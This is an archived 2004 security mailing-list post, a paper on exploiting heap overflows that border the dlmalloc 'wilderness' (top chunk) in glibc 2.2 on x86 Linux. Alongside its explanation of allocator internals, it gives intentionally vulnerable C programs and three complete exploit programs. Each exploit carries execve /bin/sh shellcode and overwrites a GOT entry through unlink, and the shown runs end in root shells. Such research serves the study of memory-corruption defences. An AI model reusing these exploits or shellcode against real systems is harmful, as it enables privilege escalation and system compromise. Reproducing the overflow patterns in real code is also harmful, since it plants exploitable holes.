lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200402240550.i1O5oo6r035692@mailserver2.hushmail.com>
From: phantasmal at hush.ai (Phantasmal Phantasmagoria)
Subject: Exploiting the Wilderness

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------

Exploiting The Wilderness
by Phantasmal Phantasmagoria
phantasmal@...h.ai

- ---- Table of Contents -------------

        1 - Introduction
          1.1 Prelude
          1.2 The wilderness
        2 - Exploiting the wilderness
          2.1 Exploiting the wilderness with malloc()
          2.2 Exploiting the wilderness with an off-by-one
        3 - The wilderness and free()
        4 - A word on glibc 2.3
        5 - Final thoughts

- ------------------------------------

- ---- Introduction ------------------

- ---- Prelude

This paper outlines a method of exploiting heap overflows on dlmalloc
based glibc 2.2 systems. In situations where an overflowable buffer is
contiguous to the wilderness it is possible to acheive the aa4bmo primitive
[1].

This article is written with an x86/Linux target in mind. It is assumed
the reader is familiar with the dlmalloc chunk format and the traditional
methods of exploiting dlmalloc based overflows [2][3]. It may be desired
to obtain a copy of the complete dlmalloc source code from glibc itself,
 as excerpts are simplified and may lose a degree of context.

- ---- The wilderness

The wilderness is the top-most chunk in allocated memory. It is similar
to any normal malloc chunk - it has a chunk header followed by a variably
long data section. The important difference lies in the fact that the
wilderness, also called the top chunk, borders the end of available memory
and is the only chunk that can be extended or shortened. This means it
must be treated specially to ensure it always exists; it must be preserved.

The wilderness is only used when a call to malloc() requests memory of
a size that no other freed chunks can facilitate. If the wilderness is
sufficiently large enough to handle the request it is split in to two,
 one part being returned for the call to malloc(), and the other becoming
the new wilderness. In the event that the wilderness is not large enough
to handle the request, it is extended with sbrk() and split as described
above. This behaviour means that the wilderness will always exist, and
furthermore, its data section will never be used. This is called wilderness
preservation and as such, the wilderness is treated as the last resort
in allocating a chunk of memory [4].

Consider the following example:

/* START wilderness.c */
#include <stdio.h>

int main(int argc, char *argv[]) {
        char *first, *second;

        first = (char *) malloc(1020);          /* [A] */
        strcpy(first, argv[1]);                 /* [B] */

        second = (char *) malloc(1020);         /* [C] */
        strcpy(second, "polygoria!");

        printf("%p | %s\n", first, second);
}
/* END wilderness.c */

It can be logically deduced that since no previous calls to free() have
been made our malloc() requests are going to be serviced by the existing
wilderness chunk. The wilderness is split in two at [A], one chunk of
1024 bytes (1020 + 4 for the size field) becomes the 'first' buffer,
while the remaining space is used for the new wilderness. This same process
happens again at [C].

Keep in mind that the prev_size field is not used by dlmalloc if the
previous chunk is allocated, and in that situation can become part of
the data of the previous chunk to decrease wastage. The wilderness chunk
does not utilize prev_size (there is no possibility of the top chunk
being consolidated) meaning it is included at the end of the 'first'
buffer at [A] as part of its 1020 bytes of data. Again, the same applies
to the 'second' buffer at [C].

The wilderness chunk being handled specially by the dlmalloc system led
to Michel "MaXX" Kaempf stating in his 'Vudo malloc tricks' [2] article,
 "The wilderness chunk is one of the most dangerous opponents of the
attacker who tries to exploit heap mismanagement". It is this special
handling of the wilderness that we will be manipulating in our exploits,
 turning the dangerous opponent into, perhaps, an interesting conquest.

- ------------------------------------

- ---- Exploiting the wilderness -----

- ---- Exploiting the wilderness with malloc()

Looking at our sample code above we can see that a typical buffer overflow
exists at [B]. However, in this situation we are unable to use the traditional
unlink technique due to the overflowed buffer being contiguous to the
wilderness and the lack of a relevant call to free(). This leaves us
with the second call to malloc() at [C] - we will be exploiting the special
code used to set up our 'second' buffer from the wilderness.

Based on the knowledge that the 'first' buffer borders the wilderness,
 it is clear that not only can we control the prev_size and size elements
of the top chunk, but also a considerable amount of space after the chunk
header. This space is the top chunk's unused data area and proves crucial
in forming a successful exploit.

Lets have a look at the important chunk_alloc() code called from our
malloc() requests:

   /* Try to use top chunk */
   /* Require that there be a remainder, ensuring top always exists */
   if ((remainder_size = chunksize(top(ar_ptr)) - nb)
                < (long)MINSIZE)                        /* [A] */
   {
     ...
     malloc_extend_top(ar_ptr, nb);
     ...
   }

   victim = top(ar_ptr);
   set_head(victim, nb | PREV_INUSE);
   top(ar_ptr) = chunk_at_offset(victim, nb);
   set_head(top(ar_ptr), remainder_size | PREV_INUSE);
   return victim;

This is the wilderness chunk code. It checks to see if the wilderness
is large enough to service a request of nb bytes, then splits and recreates
the top chunk as described above. If the wilderness is not large enough
to hold the minimum size of a chunk (MINSIZE) after nb bytes are used,
 the heap is extended using malloc_extend_top():

   mchunkptr old_top = top(ar_ptr);
   INTERNAL_SIZE_T old_top_size = chunksize(old_top);   /* [B] */
   char *brk;
   ...
   char *old_end = (char*)(chunk_at_offset(old_top, old_top_size));
   ...
   brk = sbrk(nb + MINSIZE);                            /* [C] */
   ...
   if (brk == old_end) {                                /* [D] */
     ...
     old_top = 0;
   }
   ...
   /* Setup fencepost and free the old top chunk. */
   if(old_top) {                                        /* [E] */
     old_top_size -= MINSIZE;
     set_head(chunk_at_offset(old_top, old_top_size + 2*SIZE_SZ),
                0|PREV_INUSE);
     if(old_top_size >= MINSIZE) {                      /* [F] */
       set_head(chunk_at_offset(old_top, old_top_size),
                (2*SIZE_SZ)|PREV_INUSE);
       set_foot(chunk_at_offset(old_top, old_top_size), (2*SIZE_SZ));
       set_head_size(old_top, old_top_size);
       chunk_free(ar_ptr, old_top);
     } else {
       ...
     }
   }

The above is a simplified version of malloc_extend_top() containing only
the code we are interested in. We can see the wilderness being extended
at [C] with the call to sbrk(), but more interesting is the chunk_free()
request in the 'fencepost' code.

A fencepost is a space of memory set up for checking purposes [5]. In
the case of dlmalloc they are relatively unimportant, but the code above
provides the crucial element in exploiting the wilderness with malloc().
The call to chunk_free() gives us a glimpse, a remote possibility, of
using the unlink() macro in a nefarious way. As such, the chunk_free()
call is looking very interesting.

However, there are a number of conditions that we have to meet in order
to reach the chunk_free() call reliably. Firstly, we must ensure that
the if statement at [A] returns true, forcing the wilderness to be extended.
Once in malloc_extend_top(), we have to trigger the fencepost code at
[E]. This can be done by avoiding the if statement at [D]. Finally, we
must handle the inner if statement at [F] leading to the call to chunk_free().
One other problem arises in the form of the set_head() and set_foot()
calls. These could potentially destroy important data in our attack,
so we must include them in our list of things to be handled. That leaves
us with four items to consider just in getting to the fencepost chunk_free()
call.

Fortunately, all of these issues can be solved with one solution. As
discussed above, we can control the wilderness' chunk header, essentialy
giving us control of the values returned from chunksize() at [A] and
[B]. Our solution is to set the overflowed size field of the top chunk
to a negative value. Lets look at why this works:

      - A negative size field would trigger the first if statement
        at [A]. This is because remainder_size is signed, and when
        set to a negative number still evaluates to less than
        MINSIZE.
      - The altered size element would be used for old_top_size,
        meaning the old_end pointer would appear somewhere other
        than the actual end of the wilderness. This means the if
        statement at [D] returns false and the fencepost code at
        [E] is run.
      - The old_top_size variable is unsigned and would appear to
        be a large positive number when set to our negative size
        field. This means the statement at [F] returns true, as
        old_top_size evaluates to be much greater than MINSIZE.
      - The potentially destructive chunk header modifying calls
        would only corrupt unimportant padding within our
        overflowed buffer as the negative old_top_size is used for
        an offset.

Finally, we can reach our call to chunk_free(). Lets look at the important
bits:

   INTERNAL_SIZE_T hd = p->size;
   ...
   if (!hd & PREV_INUSE))     /* consolidate backward */    /* [A] */
   {
     prevsz = p->prev_size;
     p = chunk_at_offset(p, -(long)prevsz);                 /* [B] */
     sz += prevsz;

     if (p->fd == last_remainder(ar_ptr))
       islr = 1;
     else
       unlink(p, bck, fwd);
   }

The call to chunk_free() is made on old_top (our overflowed wilderness)
meaning we can control p->prev_size and p->size. Backward consolidation
is normally used to merge two free chunks together, but we will be using
it to trigger the unlink() bug.

Firstly, we need to ensure the backward consolidation code is run at
[A]. As we can control p->size, we can trigger backward consolidation
simply by clearing the overflowed size element's PREV_INUSE bit. From
here, it is p->prev_size that becomes important. As mentioned above,
p->prev_size is actually part of the buffer we're overflowing.

Exploiting dlmalloc by using backwards consolidation was briefly considered
in the article 'Once upon a free()' [3]. The author suggests that it
is possible to create a 'fake chunk' within the overflowed buffer - that
is, a fake chunk relatively negative to the overflowed chunk header.
This would require setting p->prev_size to a small positive number which
in turn gets complemented in to its negative counterpart at [B] (digression:
please excuse my stylistic habit of replacing the more technically correct
"two's complement" with "complement"). However, such a small positive
number would likely contain NULL terminating bytes, effectively ending
our payload before the rest of the overflow is complete.

This leaves us with one other choice; creating a fake chunk relatively
positive to the start of the wilderness. This can be achieved by setting
p->prev_size to a small negative number, turned in to a small positive
number at [B]. This would require the specially crafted forward and back
pointers to be situated at the start of the wilderness' unused data area,
 just after the chunk header. Similar to the overflowed size variable
discussed above, this is convinient as the negative number need not contain
NULL bytes, allowing us to continue the payload into the data area.

For the sake of the exploit, lets go with a prev_size of -4 or 0xfffffffc
and an overflowed size of -16 or 0xfffffff0. Clearly, our prev_size will
get turned into an offset of 4, essentialy passing the point 4 bytes
past the start of the wilderness (the start being the prev_size element
itself) to the unlink() macro. This means that our fake fwd pointer will
be at the wilderness + 12 bytes and our bck pointer at the wilderness
+ 16 bytes. An overflowed size of -16 places the chunk header modifying
calls safely into our padding, while still satisfying all of our other
requirements. Our payload will look like this:

|...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPPPP|SSSSWWWWFFFFBBBBWWWWWWWW...|

A = Target buffer that we control. Some of this will be trashed by
    the chunk header modifying calls, important when considering
    shellcode placement.
P = The prev_size element of the wilderness chunk. This is part of
    our target buffer. We set it to -4.
S = The overflowed size element of the wilderness chunk. We set it
    to -16.
W = Unimportant parts of the wilderness.
F = The fwd pointer for the call to unlink(). We set it to the
    target return location - 12.
B = The bck pointer for the call to unlink(). We set it to the
    return address.

We're now ready to write our exploit for the vulnerable code discussed
above. Keep in mind that a malloc request for 1020 is padded up to 1024
to contain room for the size field, so we are exactly contiguous to the
wilderness.

$ gcc -o wilderness wilderness.c
$ objdump -R wilderness | grep printf
08049650 R_386_JUMP_SLOT   printf
$ ./wilderness 123
0x8049680 | polygoria!

/* START exploit.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define RETLOC  0x08049650 /* GOT entry for printf */
#define RETADDR 0x08049680 /* start of 'first' buffer data */

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
        char *p, *payload = (char *) malloc(1052);

        p = payload;
        memset(p, '\x90', 1052);

        /* Jump 12 ahead over the trashed word from unlink() */
        memcpy(p, "\xeb\x0c", 2);

        /* We put the shellcode safely away from the possibly
	 * corrupted area */
        p += 1020 - 64 - sizeof(shellcode);
        memcpy(p, shellcode, sizeof(shellcode) - 1);

        /* Set up the prev_size and overflow size fields */
        p += sizeof(shellcode) + 64 - 4;
        *(long *) p = -4;
        p += 4;
        *(long *) p = -16;

        /* Set up the fwd and bck of the fake chunk */
        p += 8;
        *(long *) p = RETLOC - 12;
        p += 4;
        *(long *) p = RETADDR;

        p += 4;
        *(p) = '\0';

        execl("./wilderness", "./wilderness", payload, NULL);
}
/* END exploit.c */

$ gcc -o exploit exploit.c
$ ./exploit
sh-2.05a#

- ---- Exploiting the wilderness with an off-by-one

Lets modify our original vulnerable code to contain an off-by-one condition:

/* START wilderness2.c */
#include <stdio.h>

int main(int argc, char *argv[]) {
        char *first, *second;
        int x;

        first = (char *) malloc(1020);

        for(x = 0; x <= 1020 && argv[1][x] != '\0'; x++)    /* [A] */
                first[x] = argv[1][x];

        second = (char *) malloc(2020);                     /* [B] */
        strcpy(second, "polygoria!");

        printf("%p %p | %s\n", first, argv[1], second);
}
/* END wilderness2.c */

Looking at this sample code we can see the off-by-one error occuring
at [A]. The loop copies 1021 bytes of argv[1] into a buffer, 'first',
 allocated only 1020 bytes. As the 'first' buffer was split off the top
chunk in its allocation, it is exactly contiguous to the wilderness.
This means that our one byte overflow destroys the least significant
byte of the top chunk's size field.

When exploiting off-by-one conditions involving the wilderness we will
use a similar technique to that discussed above in the malloc() section;
we want to trigger malloc_extend_top() in the second call to malloc()
and use the fencepost code to cause an unlink() to occur. However, there
are a couple of important issues that arise further to those discussed
above.

The first new problem is found in trying to trigger malloc_extend_top()
from the wilderness code in chunk_alloc(). In order to force the heap
to extend the size of the wilderness minus the size of our second request
(2020) needs to be less than 16. When we controlled the entire size field
in the section above this was not a problem as we could easily set a
value less than 16, but since we can only control the least significant
byte of the wilderness' size field we can only decrease the size by a
limited amount. This means that in some situations where the wilderness
is too big we cannot trigger the heap extension code. Fortunately, it
is common in real world situations to have some sort of control over
the size of the wilderness through attacker induced calls to malloc().

Assuming that our larger second request to malloc() will attempt to extend
the heap, we now have to address the other steps in running the fencepost
chunk_free() call. We know that we can comfortably reach the fencepost
code as we are modifying the size element of the wilderness. The inner
if statement leading to the chunk_free() is usually triggered as either
our old_top_size is greater than 16, or the wilderness' size is small
enough that controlling the least significant byte is enough to make
old_top_size wrap around when MINSIZE is subtracted from it. Finally,
 the chunk header modifying calls are unimportant, so long as they occur
in allocated memory as to avoid a premature segfault. The reason for
this will become clear in a short while. All we have left to do is to
ensure that the PREV_INUSE bit is cleared for backwards consolidation
at the chunk_free(). This is made trivial by our control of the size
field.

Once again, as we reach the backward consolidation code it is the prev_size
field that becomes important. We have already determined that we have
to use a negative prev_size value to ensure our payload is not terminated
by stray NULL bytes. The negative prev_size field causes the backward
consolidation chunk_at_offset() call to use a positive offset from the
start of the wilderness. However, unlike the above situation we do not
control any of the wilderness after the overflowed least significant
byte of the size field. Knowing that we can only go forward in memory
at the consolidation and that we don't have any leverage on the heap,
 we have to shift our attention to the stack.

The stack may initally seem to be an unlikely factor when considering
a heap overflow, but in our case where we can only increase the values
passed to unlink() it becomes quite convinient, especially in a local
context. Stack addresses are much higher in memory than their heap counterparts
and by correctly setting the prev_size field of the wilderness, we can
force an unlink() to occur somewhere on the stack. That somewhere will
be our payload as it sits in argv[1]. Using this heap-to-stack unlink()
technique any possible corruption of our payload in the heap by the chunk
header modifying calls is inconsequential to our exploit; the heap is
only important in triggering the actual overflow, the values for unlink()
and the execution of our shellcode can be handled on the stack.

The correct prev_size value can be easily calculated when exploiting
a local vulnerability. We can discover the address of both argv[1] and
the 'first' buffer by simulating our payload and using the output of
running the vulnerable program. We also know that our prev_size will
be complemented into a positive offset from the start of the wilderness.
To reach argv[1] at the chunk_at_offset() call we merely have to subtract
the address of the start of the wilderness (the end of the 'first' buffer
minus 4 for prev_size) from the address of argv[1], then complement the
result. This leaves us with the following payload:

|FFFFBBBBDDDDDDDDD...DDDDDDDDPPPP|SWWWWWWWWWWW...|

F = The fwd pointer for the call to unlink(). We set it to the
    target return location - 12.
B = The bck pointer for the call to unlink(). We set it to the
    return address.
D = Shellcode and NOP padding, where we will return in argv[1].
S = The overflowed byte in the size field of the wilderness. We set
    it to the lowest possible value that still clears PREV_INUSE, 2.
W = Unimportant parts of the wilderness.

$ gcc -o wilderness2 wilderness2.c
$ objdump -R wilderness2 | grep printf
08049684 R_386_JUMP_SLOT    printf

/* START exploit2.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define RETLOC 0x08049684 /* GOT entry for printf */
#define ARGV1 0x01020304 /* start of argv[1], handled later */
#define FIRST 0x04030201 /* start of 'first', also handled later */

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
        char *p, *payload = (char *) malloc(1028);
        long prev_size;

        p = payload;
        memset(p, '\x90', 1028);
        *(p + 1021) = '\0';

        /* Set the fwd and bck for the call to unlink() */
        *(long *) p = RETLOC - 12;
        p += 4;
        *(long *) p = ARGV1 + 8;
        p += 4;

        /* Jump 12 ahead over the trashed word from unlink() */
        memcpy(p, "\xeb\x0c", 2);

        /* Put shellcode at end of NOP sled */
        p += 1012 - 4 - sizeof(shellcode);
        memcpy(p, shellcode, sizeof(shellcode) - 1);

        /* Set up the special prev_size field. We actually want to
         * end up pointing to 8 bytes before argv[1] to ensure the
         * fwd and bck are hit right, so we add 8 before
         * complementing. */
        prev_size = -(ARGV1 - (FIRST + 1016)) + 8;
        p += sizeof(shellcode);
        *(long *) p = prev_size;

        /* Allow for a test condition that will not segfault the
         * target when getting the address of argv[1] and 'first'.
         * With 0xff malloc_extend_top() returns early due to error
         * checking. 0x02 is used to trigger the actual overflow. */
        p += 4;
        if(argc > 1)
                *(char *) p = 0xff;
        else
                *(char *) p = 0x02;

        execl("./wilderness2", "./wilderness2", payload, NULL);
}
/* END exploit2.c */

$ gcc -o exploit2 exploit2.c
$ ./exploit2 test
0x80496b0 0xbffffac9 | polygoria!
$ cat > diffex
6,7c6,7
< #define ARGV1 0x01020304 /* start of argv[1], handled later */
< #define FIRST 0x04030201 /* start of 'first', also handled later */
- ---
> #define ARGV1 0xbffffac9 /* start of argv[1] */
> #define FIRST 0x080496b0 /* start of 'first' */
$ patch exploit2.c diffex
patching file exploit2.c
$ gcc -o exploit2 exploit2.c
$ ./exploit2
sh-2.05a#

- ------------------------------------

- ---- The wilderness and free() -----

Lets now consider the following example:

/* START wilderness3a.c */
#include <stdio.h>

int main(int argc, char *argv[]) {
        char *first, *second;

        first = (char *) malloc(1020);
        strcpy(first, argv[1]);
        free(first);

        second = (char *) malloc(1020);
}
/* END wilderness3a.c */

Unfortunately, this situation does not appear to be exploitable. When
exploiting the wilderness calls to free() are your worst enemy. This
is because chunk_free() handles situations directly involving the wilderness
with different code to the normal backward or forward consolidation.
Although this special 'top' code has its weaknesses, it does not seem
possible to either directly exploit the call to free(), nor survive it
in a way possible to exploit the following call to malloc(). For those
interested, lets have a quick look at why:

   INTERNAL_SIZE_T hd = p->size;
   INTERNAL_SIZE_T sz;
   ...
   mchunkptr next;
   INTERNAL_SIZE_T nextsz;
   ...

   sz = hd & ~PREV_INUSE;
   next = chunk_at_offset(p, sz);
   nextsz = chunksize(next);                    /* [A] */

   if (next == top(ar_ptr))
   {
     sz += nextsz;                              /* [B] */

     if (!(hd & PREV_INUSE))                    /* [C] */
     {
       ...
     }

     set_head(p, sz | PREV_INUSE);              /* [D] */
     top(ar_ptr) = p;
     ...
   }

Here we see the code from chunk_free() used to handle requests involving
the wilderness. Note that the backward consolidation within the 'top'
code at [C] is uninteresting as we do not control the needed prev_size
element. This leaves us with the hope of using the following call to
malloc() as described above.

In this situation we control the value of nextsz at [A]. We can see that
the chunk being freed is consolidated with the wilderness. We can control
the new wilderness' size as it is adjusted with our nextsz at [B], but
unfortunately, the PREV_INUSE bit is set at the call to set_head() at
[D]. The reason this is a bad thing becomes clear when considering the
possibilites of using backward consolidation in any future calls to malloc();
the PREV_INUSE bit needs to be cleared.

Keeping with the idea of exploiting the following call to malloc() using
the fencepost code, there are a few other options - all of which appear
to be impossible. Firstly, forward consolidation. This is made unlikely
by the fencepost chunk header modifying calls discussed above, as they
usually ensure that the test for forward consolidation will fail. The
frontlink() macro has been discussed [2] as another possible method of
exploiting dlmalloc, but since we do not control any of the traversed
chunks this technique is uninteresting. The final option was to use the
fencepost chunk header modifying calls to partially overwrite a GOT entry
to point into an area of memory we control. Unfortunately, all of these
modifying calls are aligned, and there doesn't seem to be anything else
we can do with the values we can write.

Now that we have determined what is impossible, lets have a look at what
we can do when involving the wilderness and free():

/* START wilderness3b.c */
#include <stdio.h>

int main(int argc, char *argv[]) {
        char *first, *second;

        first = (char *) malloc(1020);
        second = (char *) malloc(1020);
        strcpy(second, argv[1]);                /* [A] */
        free(first);                            /* [B] */
        free(second);
}
/* END wilderness3b.c */

The general aim of this contrived example is to avoid the special 'top'
code discussed above. The wilderness can be overflowed at [A], but this
is directly followed by a call to free(). Fortunately, the chunk to be
freed is not bordering the wilderness, and thus the 'top' code is not
invoked. To exploit this we will be using forward consolidation at [B],
 the first call to free().

   /* consolidate forward */
   if (!(inuse_bit_at_offset(next, nextsz)))
   {
     sz += nextsz;

     if (!islr && next->fd == last_remainder(ar_ptr)) {
       ...
     }
     else
       unlink(next, bck, fwd);

     next = chunk_at_offset(p, sz);
   }

At the first call to free() 'next' points to our 'second' buffer. This
means that the test for forward consolidation looks at the size value
of the wilderness. To trigger the unlink() on our 'next' buffer we need
to overflow the wilderness' size field to clear the PREV_INUSE bit. Our
payload will look like this:

|FFFFBBBBDDDDDDDD...DDDDDDDD|SSSSWWWWWWWWWWWWWWWW...|

F = The fwd pointer for the call to unlink(). We set it to the
    target return location - 12.
B = The bck pointer for the call to unlink(). We set it to the
    return address.
D = Shellcode and NOP padding, where we will return.
S = The overflowed size field of the wilderness chunk. A value
    of -4 will do.
W = Unimportant parts of the wilderness.

We're now ready for an exploit.

$ gcc -o wilderness3b wilderness3b.c
$ objdump -R wilderness3b | grep free
0804962c R_386_JUMP_SLOT   free
$ ltrace ./wilderness3b 1986 2>&1 | grep malloc | tail -n 1
malloc(1020)                                       = 0x08049a58

/* START exploit3b.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define RETLOC  0x0804962c /* GOT entry for free */
#define RETADDR 0x08049a58 /* start of 'second' buffer data */

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
        char *p, *payload = (char *) malloc(1052);

        p = payload;
        memset(p, '\x90', 1052);

        /* Set up the fwd and bck pointers to be unlink()'d */
        *(long *) p = RETLOC - 12;
        p += 4;
        *(long *) p = RETADDR + 8;
        p += 4;

        /* Jump 12 ahead over the trashed word from unlink() */
        memcpy(p, "\xeb\x0c", 2);

        /* Position shellcode safely at end of NOP sled */
        p += 1020 - 8 - sizeof(shellcode) - 32;
        memcpy(p, shellcode, sizeof(shellcode) - 1);

        p += sizeof(shellcode) + 32;
        *(long *) p = -4;

        p += 4;
        *(p) = '\0';

        execl("./wilderness3b", "./wilderness3b", payload, NULL);
}
/* END exploit3b.c */

$ gcc -o exploit3b exploit3b.c
$ ./exploit3b
sh-2.05a#

- ------------------------------------

- ---- A word on glibc 2.3 -----------

Although exploiting our examples on a glibc 2.3 system would be an interesting
activity it does not appear possible to utilize the techniques described
above. Specifically, although the fencepost code exists on both platforms,
 the situations surrounding them are vastly different.

For those genuinely interested in a more detailed explanation of the
difficulties involving the fencepost code on glibc 2.3, feel free to
contact me.

- ------------------------------------

- ---- Final thoughts ----------------

For an overflow involving the wilderness to exist on a glibc 2.2 platform
might seem a rare or esoteric occurance. However, the research presented
above was not prompted by divine inspiration, but in response to a tangible
need. Thus it was not so much important substance that inclined me to
release this paper, but rather the hope that obscure substance might
be reused for some creative good by another.

- ------------------------------------

[1] http://www.phrack.org/show.php?p=61&a=6
[2] http://www.phrack.org/show.php?p=57&a=8
[3] http://www.phrack.org/show.php?p=57&a=9
[4] http://gee.cs.oswego.edu/dl/html/malloc.html
[5] http://www.memorymanagement.org/glossary/f.html#fencepost

- ------------------------------------

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAkA6PcsACgkQImcz/hfgxg0F0QCeOJsU+ZFJ+d+Cg0g5lpSio11QGqQA
n3z6846AfkvZ3/BXqUGmciT4Brvw
=k/EC
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ